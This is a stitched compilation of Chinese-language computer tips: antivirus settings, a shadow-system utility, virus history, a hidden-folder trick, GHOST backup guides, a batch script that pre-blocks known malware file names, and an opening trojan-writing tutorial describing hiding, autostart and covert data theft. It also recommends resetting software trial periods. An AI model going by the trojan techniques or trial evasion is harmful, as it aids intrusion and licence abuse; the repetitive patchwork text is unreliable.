在弹出的设置窗口中,点击左侧列表中的“Proactive Defense”,然后在右侧窗口选中“Temporarily disable self defense”即可,这样就可以临时关闭杀毒软件的自我防护(如图2)。
设置完成后点击“OK”按钮,在系统托盘区找到百度杀毒的图标后点击鼠标右键,选择菜单中的“Exit”命令退出杀毒软件。
最后再运行下载的中文汉化包安装程序,完成以后百度杀毒的操作界面就成为中文的了。
百毒不侵、永不崩溃的神奇系统!
百毒不侵、永不崩溃的神奇系统!百毒不侵、永不崩溃的神奇系统!PowerShadowMaster是款很奇特的小软体,当你安装它(安装与操作非常简单)并重新启动电脑以后,电脑会类似安装了双系统一样,多出一个启动项,选择其中PowerShadowMaster的启动项后,跟原系统完全一样的使用,而且资源使用与速度及稳定性跟原系统一样!但是你的一切操作,包括安装程式(甚至运行病毒),在下次用原系统启动时,这些操作对原系统都是无效的,亦即对原系统无任何不良影响!---------这就是影子系统PowerShadow 的精髓所在。
PowerShadow, 它并非虚拟系统,因为PowerShadow是执行在使用中的系统上, PowerShadow只是原系统的影子! 意思是说, 原系统中安装了的任何软体, 设定, 一切都在影子系统中保存. 而且用户可以随时调用影子系统, 影子系统便马上进入状态, 用户不须重新安装系统, 亦不须等待执行时间, PowerShadow的最大特点是, 用户由原系统进入影子系统, 再退出影子系统返回原系统的整个过程, 所做的档案储存, 上网记录, 软体安装等等都不会被记录.可以说, [就像没有做过任何事情]一样. 所以影子系统的应用非常广泛, 例如进入影子系统后便不怕病毒入侵, 你可以随意打开可疑邮件的执行档, 就算执行档是病毒,它马上发作, 但是只要你退出影子系统便像什么也没有发生过, 一切安好. 如果你想安装一个软体作测试, 在影子系统中便最好不过, 因为就算安装失败, 或试用完成,你只要退出影子系统, 在原系统中会发觉根本就没有安装过这个软体, 你甚至不须移除软体. 如果你打算流览很多网页, 又不想网址被记录, 在影子系统中便最好不过,因为退出影子系统后将不留下任何痕迹.PowerShadow有两种模式, 一种是Single Shadow模式,另一种是Full Shadow模式. 使用Single Shadow模式是最常用的, 因为它只对作业系统的分区进行作用, 而不会影响其他分区. 而Full Shadow便将整个硬碟发生作用, 就是其他分区都变成影子硬碟了. 因为在影子硬碟中是不能档案储存的, 所以如果在Single Shadow模式中,建立了一诋档案想储存, 通常都会储存在其他分区中, 这样就算退出Shadow Mode, 返回原系统, 建立的档案还会存在, 否则建立的档案会自动消失.如果在Full Shadow模式中想储存档案, 便需要储存在外置储存装置上了.在Shadow Mode中, 因为不会保存任何资料, 档案的关系, 所以使用IE上网, 就算键入过的网址都不会记录. 虽然笔者想不到记录网址有什么好处,不过这技巧或者在某种情况下是有用途的. 如果不是使用Shadow Mode, 平时我们亦可以在流览完网页后,一次过将IE的网页址记录清除(这个我觉得只是为求方便)很多人都会在电脑中安装不同的软体, 但是软体安装又移除,这样不断重复, 系统会积存很多无用的东西. 如果软体和作业系统不相容, 更加可能导致死机, 或者无法进入Windows. 遇上这情况, 使用影子系统便最好不过,因为在Shadow Mode中就算你安装任何软体, 只要退出Shadow Mode, 返回原系统时是看不到软体的存在的, 就像未曾安装过软体一样, 你连移除软体的操作都不用. 而且使用Shadow Mode比使用虚拟电脑作调试的好处是, Virtual PC其实是在另一个系统上调试, 对于真正系统能否相容还是不肯定. 但使用PowerShadow却是在现行系统中作调试, 软体相容一试即知利用PowerShadow除了可以作软体调试外, 其实用户利用它可以无限期使用软体. 有没有发觉很多软体都有试用期限, 例如三天, 十四天, 三十天等等.过了这个日期, 软体便无法再使用, 很多时就算移除软体重新安装结果都是一样, 这是一个极大的麻烦, 如果想软体永久试用的话, 那么下次安装这类麻烦软体时,可以在Shadow Mode中安装, 用完一两次, 便返回原系统, 因为系统中没有软体的任何记录, 下次想再试用软体时又再在Shadow Mode 重新安装便可,这方法万试万灵!PowerShadow的优点综合来说,使用PowerShadow的好处便是[能在不影响原系统的情况下, 使用原系统的所有功能.]不要小看这个功能,这个功能平时要实现非得使用诸如GHOST之类的程式不可. 但如果想用GHOST代替PowerShadow的功能, 非得在每次想调试时, 先做一个GHOSTIMAGE, 然后便调试, 调试完再用GHOST还原系统. 可是当系统容量愈来愈大, 做出来的GHOST IMAGE容量愈大, 而且制造IMAGE的时间便愈长,更加需要时间去还原. 使用PowerShadow却可随时进入影子系统, 只是1秒间的事,比使用GHOST的大工程节省甚多时间.主要应用1、利用PowerShadow能对操作不留任何痕迹;2、预防病毒入侵、发作、木马的攻击等,真正的百毒不侵;3、测试、调试新软体,无任何后顾之忧与删除垃圾之工作;4、限时软件永不过期;5、修改注册表时, 可以在PowerShadow上尝试,看看会否出现严重问题;6、服务器上使用PowerShadow, 让它更加安全、稳定,并减少管理员维护的负担。
电脑病毒是怎么制作的
电脑病毒是怎么制作的计算机病毒是当今的电脑用户不想遇到的,那你们肯定会好奇电脑病毒是怎么制造的,下面是店铺为大家整理的内容,希望对大家有所帮助!计算机病毒的制作过程:1.计算机病毒的特征是传播性,非授权性,隐藏性,潜伏性,破坏性,不可预见性,可触发性。
2.计算机病毒根据感染方式可以分为感染可执行文件的病毒,感染引导区的病毒,感染文档文件的病毒3.现阶段的反病毒技术有特征码扫描,启发式扫描,虚拟机技术,主动防御技术,自免疫技术,云杀毒等等。
4.一个简单病毒的模块包含,触发模块,传播模块,表现模块。
5.学习计算机病毒,要了解硬盘结构,计算机扇区结构,计算机系统启动过程,文件系统,计算机引导过程。
6.汇编语言和C语言用的会比较多。
7.现阶段也有一些简单病毒制造机,此类软件可以在网上找到。
计算机病毒产生说法:1.最早是为了恶作剧,计算机病毒最早出现于DOS,这是一个引导阶段,在这个阶段下,人们都是为了恶作剧,出现于1987年,当时的计算机硬件较少,功能简单,一般需要通过软盘启动后使用.引导型病毒利用软盘的启动原理工作,它们修改系统启动扇区,在计算机启动时首先取得控制权,减少系统内存,修改磁盘读写中断,影响系统工作效率,在系统存取磁盘时进行传播。
1989年引导型病毒发展为可以感染硬盘,典型的代表有“石头(2)”2.1989年,可执行文件型病毒出现,利用DOS系统加载执行文件的机制工作,代表为“耶路撒冷”,“星期天”病毒,病毒代码在系统执行文件时取得控制权,修改DOS中断,在系统调用时进行传染,并将自己附加在可执行文件中,使文件长度增加。
3。
1990年,发展为复合型病毒,可感染COM和EXE文件。
4.1992年,伴随型病毒出现,它们利用DOS加载文件的优先顺序进行工作。
5.1994年,随着汇编语言的发展,实现同一功能可以用不同的方式进行完成,这些方式的组合使一段看似随机的代码产生相同的运算结果。
幽灵病毒就是利用这个特点,每感染一次就产生不同的代码。
电脑技术-不用加密软件利用电脑本身的漏洞就可以实现加密(安全保密,百毒不侵)
不用加密软件利用电脑本身漏洞就可以实现隐藏加密(安全保密,百毒不侵)如果大家有一些隐私文件不愿意让别人看到,或者有些重要的文件不想被病毒破坏,又或者有些文件不想被熊孩子给强行删除,该怎么办呢?隐藏起来?换个名字?或者加密?这些方法都可以,但还有一种更有效的方法,就是利用系统自身的漏洞建立一个别人既不能进入又不能删除的文件夹,甚至连看都看不到的文件夹,把自己的重要文件放进去,既安全又保密,因为系统本身不承认,所以一般病毒软件通常也不会承认,因此重要文件通常就不会受到病毒影响破坏,真正达到安全保密,百毒不侵。
关键是,不用第三方加密软件,实现起来很简单。
建立真正隐藏的文件夹,放敏感资料。
1、建立文件夹以Windows XP的fat32格式为例,在D盘创建一个名为“a.”的文件夹:⑴运行cmd⑵在cmd窗口中输入如下命令:md D:\a..\ (在D盘创建文件夹名为a.)按照DOS命令的语法规则,建立的文件名为“a..\”。
但是宣示出来的文件架的名是“a.”少了一个点和一个反斜杠。
反斜杠“\”在windows中是路径的分隔符号比如“C:\Windows\”的意思就是C分区中的Windows文件夹,“C:\Windows\cmd.exe”的意思就是C分区中的Windows文件夹中的cmd.exe 文件。
那么,如果文件名中有“\”符号会怎么样呢?假如“a\”是一个文件的名字,这个文件位于“D:\”(D盘),则它的路径就是“D:\a\”,当我们试图访问这个文件的时候Windows会错误地认为我们要打开的文件是D分区的a文件夹,这样Windows就无法打开并且会返回一个错误,因为以上的路径并不存在。
当然现在正在尝试创建“A\”文件,但是Windows会给出提示:“\”符号是不能作为文件或者文件夹的名字的。
现在来看看你的D盘下面是不是多了一个名为“a.”的文件夹?这个文件夹既不能访问又不能删除,不信试试看!但是毕竟这个文件夹还可以看到,能不能一步到位,连看都看不到呢?参看后面的提升“建立看不见的隐藏文件夹”。
手动编写windows简单木马
⼿动编写windows简单⽊马声明:本帖仅作技术交流,切莫⽤于⾮法⽤途。
否则造成的⼀切法律责任与作者⽆关。
"使⽤C++实现⼀个简单的⽊马,实现⽊马的远程控制功能,能够开机⾃启动和伪装或隐藏,最后通过清除本⽊马,掌握常规的⽊马排查和查杀⽅法。
"⼯具:vc++6.0攻击机:win10(ip随机) 靶机:192.168.1.129⼀、⽊马是什么?这是⼀个⽼⽣常谈的问题,⽊马(Trojan)这个名字来源于古希腊传说(荷马史诗中⽊马计的故事,Trojan⼀词的本意是特洛伊的,即代指特洛伊⽊马,也就是⽊马计的故事)。
⼆、⽊马隐藏技术⽊马会想尽⼀切办法隐藏⾃⼰,主要途径有:在任务栏中隐藏⾃⼰,这是最基本的办法。
只要把Form的Visible属性设为False,ShowInTaskBar设为False,程序运⾏时就不会出现在任务栏中了(MFC编程)。
在任务管理器中隐形:将程序设为“系统服务”可以很轻松地伪装⾃⼰。
当然它也会悄⽆声息地启动,⿊客当然不会指望⽤户每次启动后点击“⽊马”图标来运⾏服务端,“⽊马”会在每次⽤户启动时⾃动装载。
Windows系统启动时⾃动加载应⽤程序的⽅法,“⽊马”都会⽤上,如:启动组、Win.ini、System.ini、注册表等都是“⽊马”藏⾝的好地⽅。
⽊马与计算机⽹络中常常要⽤到的远程控制软件有些相似,但由于远程控制软件是“善意”的控制,因此通常不具有隐蔽性;“⽊马”则完全相反,⽊马要达到的是“偷窃”性的远程控制,如果没有很强的隐蔽性的话,那就是“毫⽆价值”的。
三、⽊马程序原理:⽊马病毒的⼯作原理:⼀个完整的特洛伊⽊马套装程序含了两部分:服务端(服务器部分)和客户端(控制器部分)。
植⼊对⽅电脑的是服务端,⽽⿊客正是利⽤客户端进⼊运⾏了服务端的电脑。
运⾏了⽊马程序的服务端以后,会产⽣⼀个有着容易迷惑⽤户的名称的进程,暗中打开端⼝,向指定地点发送数据(如⽹络游戏的密码,即时通信软件密码和⽤户上⽹密码等),⿊客甚⾄可以利⽤这些打开的端⼝进⼊电脑系统。
图解一键ghost使用教程
GHOST使用详细图文教程镜像文件此处泛指GHOST软件制作成的压缩文件以.gho 为后缀在ghost中显示为黄色源盘即将要备份的磁盘在一般的情况下我们泛指操作系统盘C盘镜像盘存放备份镜像的磁盘在一般的情况下我们泛指文件存放盘D盘或E F G 盘打包制作镜像文件通常是指将操作系统盘C盘经压缩后存放在其它盘如D盘里面解包还原镜像文件通常在系统盘C盘出现错误或病毒木马后将存放在其它盘里面的镜像文件还原到系统盘内以求能恢复干净良好的操作系统我在写这个网页是在一个前题下的1 针对没有软驱没有光驱没有引导光盘也不会用光盘启动的人能够在本地硬盘上简单操作就可维护好的2 针对纯windows98 系统针对FAT32的分区理论上XP或者说比98好点多但个人认为安全第一实用第一速度第一我看见过的相当多的朋友们尤其是刚刚接触电脑的人用XP的中毒率大于90% 能够在一年内平安的不出钱不需要别人维护的人小于20% 98如果用得好通常中毒的可能性等于零的也不是想像的那么容易死机的我原来用98做主机的时候也曾经有过30天以上没有关机的3 针对对电脑不是太懂或十分不懂的朋友所写的我不能要求到他们了解到各种分区格式内存交换文件休眠文件…… 故而GHOST 的相当多的其它功能都没有讲到仅仅只讲到了最基本最实用的部分一下要求他们了解到许多他们或者说会望而却步的只有当他们了解到了初步再在实用阶段慢慢的一步一步熟悉他们或才会一通百通的4 个人主张如无特别必要不要在系统上安装限制性的软件或系统优化软件通常都没有实际用处而通常或有副作用的通常只有RMB 能够真正优化到电脑一使用GHOST之前必定要注意到的事1.在备份系统时如果您是选择的FAT32的分区格式单个的备份文件最好不要超过2GBGHOST建议您选用选用最新的版本号需要最少GHOST8.0版本或以上的版本2.在备份系统前最好将一些无用的文件删除以减少Ghost文件的体积通常无用的文件有:Windows的临时文件夹如果您不是太了解只建议您删除C:\\WINDOWS\\TEMP 下面的文件镜像文件应尽量保持“干净” “基本”。
一个批处理让你的电脑免疫所有木马病毒
一个批处理让你的电脑免疫所有木马病毒为了编写这这个批处理程序,本人整整研究了1个多星期,终于完成了,给大家分享。
不发附件,我要的是让大家都可以分享这个好程序。
我把原代码发上来!觉得的好的,只需要帮我顶下帖子就行!谢谢!!@echo offcolor 0aecho******************************************************************* ***********echo * *echo * 现在进行机器狗免疫 *echo * *echo******************************************************************* ***********md C:\WINDOWS\system32\wxptdi.sys 2>nulmd C:\WINDOWS\system32\wxptdi.sys\1..\ 2>nulmd C:\WINDOWS\system32\fat32.sys 2>nulmd C:\WINDOWS\system32\fat32.sys\1..\ 2>nulmd C:\WINDOWS\system32\drivers\ati32srv.sys 2>nulmd C:\WINDOWS\system32\drivers\ati32srv.sys\1..\ 2>nul md C:\WINDOWS\system32\drivers\pcibus.sys 2>nulmd C:\WINDOWS\system32\drivers\pcibus.sys\1..\ 2>nulmd C:\WINDOWS\system32\drivers\pcidisk.sys 2>nulmd C:\WINDOWS\system32\drivers\pcidisk.sys\1..\ 2>nul md C:\WINDOWS\system32\drivers\pcihdd.sys 2>nulmd C:\WINDOWS\system32\drivers\pcihdd.sys\1..\ 2>nulmd C:\WINDOWS\system32\drivers\phy.sys 2>nulmd C:\WINDOWS\system32\drivers\phy.sys\1..\ 2>nulmd C:\WINDOWS\system32\drivers\pop.sys 2>nulmd C:\WINDOWS\system32\drivers\pop.sys\1..\ 2>nulmd C:\WINDOWS\system32\drivers\puid.sys 2>nulmd C:\WINDOWS\system32\drivers\puid.sys\1..\ 2>nulmd C:\WINDOWS\system32\drivers\usb32k.sys 2>nulmd C:\WINDOWS\system32\drivers\usb32k.sys\1..\ 2>nul md C:\WINDOWS\system32\2dogkiller.sys 2>nulmd C:\WINDOWS\system32\2dogkiller.sys\1..\ 2>nulattrib C:\WINDOWS\system32\wxptdi.sys +s +h +r +a 2>nul attrib C:\WINDOWS\system32\fat32.sys +s +h +r +a 2>nul attrib C:\WINDOWS\system32\drivers\ati32srv.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\ati32srv.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\pcidisk.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\pcihdd.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\phy.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\pop.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\puid.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\puid.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\usb32k.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\2dogkiller.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\pcibus.sys +s +h +r +a 2>nulecho y|cacls C:\WINDOWS\system32\2dogkiller.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\usb32k.sys /d everyone2 >nulecho y|cacls C:\WINDOWS\system32\drivers\puid.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\pop.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\phy.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\pcihdd.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\pcidisk.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\pcibus.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\ati32srv.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\fat32.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\wxptdi.sys /d everyone 2>nulecho******************************************************************* **************echo * *echo * 免疫完成 * echo * *echo******************************************************************* **************echo******************************************************************* **************echo * *echo * 现在进行机器狗小马免疫 *echo * *echo******************************************************************* **************md c:\windows\system32\bqtldzlu.exe 2>nulmd c:\windows\system32\diynpis.exe 2>nulmd c:\windows\system32\dndsioc.exe 2>nulmd c:\windows\sytem32\fewqickd.exe 2>nulmd c:\windows\sytem32\fmschif.exe 2>nulmd c:\windows\sytem32\fmsjhif.exe 2>nulmd c:\windows\sytem32\hefcndy.exe 2>nulmd c:\windows\sytem32\hgeazpkc.exe 2>nulmd c:\windows\sytem32\anistio.exe 2>nulmd c:\windows\sytem32\anittio.exe 2>nulmd c:\windows\sytem32\isndctio.exe 2>nulmd c:\windows\sytem32\juejwcx.exe 2>nulmd c:\windows\sytem32\nbnwewd.exe 2>nulmd c:\windows\sytem32\ptshell.exe 2>nulmd c:\windows\sytem32\uiwcaqws.exe 2>nulmd c:\windows\sytem32\wipxcdec.exe 2>nulmd c:\windows\sytem32\wrew2ds.exe 2>nulmd c:\windows\system32\ytewcxzsw.exe 2>nulattrib c:\windows\system32\bqtldzlu.exe +s +r +h +a 2>nul attrib c:\windows\system32\diynpis.exe +s +r +h +a 2>nul attrib c:\windows\system32\dndsioc.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\fewqickd.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\fmschif.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\fmsjhif.exe +s +r +h +a 2>nulattrib c:\windows\sytem32\hefcndy.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\hgeazpkc.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\anistio.exe +s +r +h +a 2>nulattrib c:\windows\sytem32\anittio.exe +s +r +h +a 2>nulattrib c:\windows\sytem32\isndctio.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\juejwcx.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\nbnwewd.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\ptshell.exe +s +r +h +a 2>nulattrib c:\windows\sytem32\uiwcaqws.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\wipxcdec.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\wrew2ds.exe +s +r +h +a 2>nul attrib c:\windows\system32\ytewcxzsw.exe +s +r +h +a 2>nulecho y|cacls c:\windows\system32\bqtldzlu.exe /d everyone 2>nulecho y|cacls c:\windows\system32\diynpis.exe /d everyone 2>nulecho y|cacls c:\windows\system32\dndsioc.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\fewqickd.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\fmschif.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\fmsjhif.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\hefcndy.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\hgeazpkc.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\anistio.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\anittio.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\isndctio.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\juejwcx.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\nbnwewd.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\ptshell.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\uiwcaqws.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\wipxcdec.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\wrew2ds.exe /d everyone 2>nulecho y|cacls c:\windows\system32\ytewcxzsw.exe /d everyone 2>nulecho*********************************************************************************echo * *echo * 免疫完成 * echo * *echo******************************************************************* **************echo******************************************************************* **************echo * *echo * 进行Auto免疫 *echo * *echo******************************************************************* **************for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%a:\auto.exe >nul 2>nulfor %%h in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%h:\auto.exe\1..\ >nul 2>nulfor %%b in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%b:\autorun.inf >nul 2>nulfor %%g in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%g:\autorun.inf\1..\ >nul 2>nulfor %%c in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib %%c:\auto.exe +s +h +r +a >nul 2>nulfor %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib %%d:\autorun.inf +s +h +r +a >nul 2>nulfor %%e in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echoy|cacls %%e:\auto.exe /d everyone >nul 2>nulfor %%f in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls %%f:\autorun.inf /d everyone >nul 2>nulecho******************************************************************* **************echo * *echo * 免疫完成 * echo * *echo******************************************************************* **************echo******************************************************************* ************echo * *echo * 现在进行IGM免役 *echo * *echo******************************************************************* ************md c:\windows\IGW.exe 2>nulmd c:\windows\AVPSrv.exe 2>nulmd c:\windows\DiskMan32.exe 2>nulmd c:\windows\IGM.exe 2>nulmd c:\windows\Kvsc3.exe 2>nulmd c:\windows\lqvytv.exe 2>nulmd c:\windows\MsIMMs32.exe 2>nulmd c:\windows\system32\3CEBCAF.exe 2>nulmd c:\windows\system32\racvsvc.exe 2>nulmd c:\windows\nvdispdrv.exe 2>nulmd c:\windows\dbghlp32.exe 2>nulmd c:\windows\system32\drivers\svchost.exe 2>nulmd c:\windows\system32\a.exe 2>nulmd c:\windows\upxdnd.exe 2>nulmd c:\windows\WinForm.exe 2>nulmd c:\windows\system32\rsjzbpm.dll 2>nulmd c:\windows\system32\cmdbcs.dll 2>nulmd c:\windows\system32\upxdnd.dll 2>nulmd c:\windows\system32\yfmtdiouaf.dll 2>nulmd c:\windows\nvdispdrv.exe 2>nulmd c:\windows\49400MM.DLL 2>nulmd c:\windows\338448WO.dll 2>nulmd c:\windows\235780MM.dll 2>nulmd c:\windows\235780WO.DLL 2>nulattrib c:\windows\IGW.exe +s +r +h +a 2>nulattrib c:\windows\AVPSrv.exe +s +r +h +a 2>nulattrib c:\windows\DiskMan32.exe +s +r +h +a 2>nulattrib c:\windows\IGM.exe +s +r +h +a 2>nulattrib c:\windows\Kvsc3.exe +s +r +h +a 2>nulattrib c:\windows\lqvytv.exe +s +r +h +a 2>nulattrib c:\windows\MsIMMs32.exe +s +r +h +a 2>nulattrib c:\windows\system32\3CEBCAF.exe +s +r +h +a 2>nul attrib c:\windows\system32\racvsvc.exe +s +r +h +a 2>nul attrib c:\windows\nvdispdrv.exe +s +r +h +a 2>nulattrib c:\windows\dbghlp32.exe +s +r +h +a 2>nulattrib c:\windows\system32\drivers\svchost.exe +s +r +h +a 2>nulattrib c:\windows\system32\a.exe +s +r +h +a 2>nulattrib c:\windows\upxdnd.exe +s +r +h +a 2>nulattrib c:\windows\WinForm.exe +s +r +h +a 2>nulattrib c:\windows\system32\rsjzbpm.dll +s +r +h +a 2>nul attrib c:\windows\system32\cmdbcs.dll +s +r +h +a 2>nul attrib c:\windows\system32\upxdnd.dll +s +r +h +a 2>nul attrib c:\windows\system32\yfmtdiouaf.dll +s +r +h +a 2>nulattrib c:\windows\nvdispdrv.exe +s +r +h +a 2>nulattrib c:\windows\49400MM.DLL +s +r +h +a 2>nulattrib c:\windows\338448WO.dll +s +r +h +a 2>nulattrib c:\windows\235780WO.DLL +s +r +h +a 2>nulattrib c:\windows\235780MM.dll +s +r +h +a 2>nulecho y|cacls c:\windows\235780MM.dll /d everyone 2>nul echo y|cacls c:\windows\235780WO.DLL /d everyone 2>nul echo y|cacls c:\windows\338448WO.dll /d everyone 2>nul echo y|cacls c:\windows\49400MM.DLL /d everyone 2>nul echo y|cacls c:\windows\nvdispdrv.exe /d everyone 2>nulecho y|cacls c:\windows\system32\yfmtdiouaf.dll /d everyone 2>nulecho y|cacls c:\windows\system32\upxdnd.dll /d everyone 2>nulecho y|cacls c:\windows\WinForm.exe /d everyoneecho y|cacls c:\windows\system32\cmdbcs.dll /d everyone 2>nulecho y|cacls c:\windows\system32\rsjzbpm.dll /d everyone 2>nulecho y|cacls c:\windows\upxdnd.exe /d everyone 2>nulecho y|cacls c:\windows\system32\a.exe /d everyone 2>nul echo y|cacls c:\windows\system32\drivers\svchost.exe /d everyone 2>nulecho y|cacls c:\windows\dbghlp32.exe /d everyone 2>nulecho y|cacls c:\windows\nvdispdrv.exe /d everyone 2>nulecho y|cacls c:\windows\system32\racvsvc.exe /d everyone 2>nulecho y|cacls c:\windows\system32\3CEBCAF.exe /d everyone 2>nulecho y|cacls c:\windows\lqvytv.exe /d everyone 2>nulecho y|cacls c:\windows\MsIMMs32.exe /d everyone 2>nul echo y|cacls c:\windows\Kvsc3.exe /d everyone 2>nulecho y|cacls c:\windows\IGM.exe /d everyone 2>nulecho y|cacls c:\windows\DiskMan32.exe /d everyone 2>nul echo y|cacls c:\windows\AVPSrv.exe /d everyone 2>nulecho y|cacls c:\windows\IGW.exe /d everyone 2>nulecho******************************************************************* **************echo * *echo * 免疫完成 * echo * *echo******************************************************************* **************echo******************************************************************* **************echo * *echo * 现在进行AV免疫 *echo * *echo******************************************************************* **************for %%x in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%x:\hfhludy.exe >nul 2>nulfor %%y in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%y:\hfhludy.exe\1..\ >nul 2>nulfor %%r in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib %%r:\hfhludy.exe +s +h +r +a >nul 2>nulfor %%u in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo y|cacls %%u:\hfhludy.exe /d everyone >nul 2>nulecho******************************************************************* **************echo * *echo * 免疫完成 * echo * * echo******************************************************************* **************echo******************************************************************* **************echo * *echo * 现在进行病毒下载器免疫 *echo * *echo******************************************************************* **************md c:\windows\system32\conime.exe.tmp2 2>nulattrib c:\windows\system32\conime.exe.tmp2 +s +h +r +a 2>nulecho y|cacls c:\windows\system32\conime.exe.tmp2 /d everyone 2>nulecho******************************************************************* **************echo * *echo * 免疫完成 * echo * * echo******************************************************************* **************echo******************************************************************* **************echo * *echo* * echo* * echo * *echo * *echo* * echo * 枯柳树制作 *echo* QQ:491111404 * echo * *echo * *echo * *echo * *echo * *echo * *echo******************************************************************* **************pause复制粘贴到TXT文本文档里,保存后更改扩展名为BAT就可以了最后说1句,大家学习黑客技术是为了更好的保护自己,而不去恶意的破坏别人的电脑。
GHOST详细使用方法(教程详解)
ghost是一个备份软件它能将一个分区内所有文件通常我们是将系统盘C盘制作成一个“压缩文件” 存放在电脑其它安全的分区内再在系统出现任意已知或未知的问题时候再启动GHOST 提取此备份文件再还原到系统盘C盘以保证到系统正常安全运行GHOST适用于各种操作系统但对于刚刚接触电脑用户而言使用windows98或比较容易操故而此处是以windows98 为例名词解释镜像文件此处泛指GHOST软件制作成的压缩文件以.gho 为后缀在ghost中显示为黄色源盘即将要备份的磁盘在一般的情况下我们泛指操作系统盘C盘镜像盘存放备份镜像的磁盘在一般的情况下我们泛指文件存放盘D盘或E F G 盘打包制作镜像文件通常是指将操作系统盘C盘经压缩后存放在其它盘如D盘里面解包还原镜像文件通常在系统盘C盘出现错误或病毒木马后将存放在其它盘里面的镜像文件还原到系统盘内以求能恢复干净良好的操作系统我在写这个网页是在一个前题下的1 针对没有软驱没有光驱没有引导光盘也不会用光盘启动的人能够在本地硬盘上简单操作就可维护好的2 针对纯windows98 系统针对FAT32的分区理论上XP或者说比98好点多但个人认为安全第一实用第一速度第一我看见过的相当多的朋友们尤其是刚刚接触电脑的人用XP的中毒率大于90% 能够在一年内平安的不出钱不需要别人维护的人小于20% 98如果用得好通常中毒的可能性等于零的也不是想像的那么容易死机的我原来用98做主机的时候也曾经有过30天以上没有关机的3 针对对电脑不是太懂或十分不懂的朋友所写的我不能要求到他们了解到各种分区格式内存交换文件休眠文件…… 故而GHOST的相当多的其它功能都没有讲到仅仅只讲到了最基本最实用的部分一下要求他们了解到许多他们或者说会望而却步的只有当他们了解到了初步再在实用阶段慢慢的一步一步熟悉他们或才会一通百通的4 个人主张如无特别必要不要在系统上安装限制性的软件或系统优化软件通常都没有实际用处而通常或有副作用的通常只有RMB能够真正优化到电脑一使用之前必定要注意到的事1.在备份系统时如果您是选择的FAT32的分区格式单个的备份文件最好不要超过2GBGHOST建议您选用选用最新的版本号需要最少GHOST8.0版本或以上的版本2.在备份系统前最好将一些无用的文件删除以减少Ghost文件的体积通常无用的文件有:Windows的临时文件夹如果您不是太了解只建议您删除C:\\WINDOWS\\TEMP 下面的文件镜像文件应尽量保持“干净” “基本”。
最强的用批处理编写的病毒
